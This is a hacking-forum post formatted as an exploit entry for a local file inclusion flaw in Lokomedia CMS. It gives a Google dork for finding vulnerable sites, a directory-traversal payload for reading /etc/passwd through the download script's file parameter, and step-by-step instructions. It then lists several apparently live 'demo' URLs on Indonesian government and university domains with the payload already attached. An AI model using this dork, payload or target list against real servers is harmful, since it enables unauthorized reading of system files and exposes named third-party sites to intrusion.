Lokomedia CMS LFI Vulnerability (1 Viewer)

H

HackSpawN

Code:
***************************************************
# Exploit Title: Lokomedia CMS LFI Vulnerability
# Google Dork: inurl:/semua-download.html
# Exploit: ../../../../../../../../../../etc/passwd
# Date: 10/07/2018
# Author: 0N3R1D3R
# Team: Error Violence
# Tested on: Windows 10 x64
***************************************************
[+] Search the dork in Google
[+] Get and copy a download file, ex ( http://www.target.com/downlot.php?file=wadadaw.pdf )
[+] Change file with exploit in the target, ex ( http://www.target.com/download.php?file=../../../../../../../../../../etc/passwd )
[+] Open the file with text editor
***************************************************
[+] Demo Site
[+] http://solokkab.go.id/include/downlot.php?file=../../../../../../../../../../etc/passwd
[+] http://www.bengkaliskab.go.id/downlot.php?file=../../../../../../../../../../etc/passwd
[+] http://www.kapuashulukab.go.id/downlot.php?file=../../../../../../../../../../etc/passwd
[+] http://kpu-boyolali.go.id/downlot.php?file=../../../../../../../../../../etc/passwd
[+] http://staiyasnibungo.ac.id/download.php?file=../../../../../../../../../../etc/passwd
***************************************************
 

Users who are viewing this thread

Top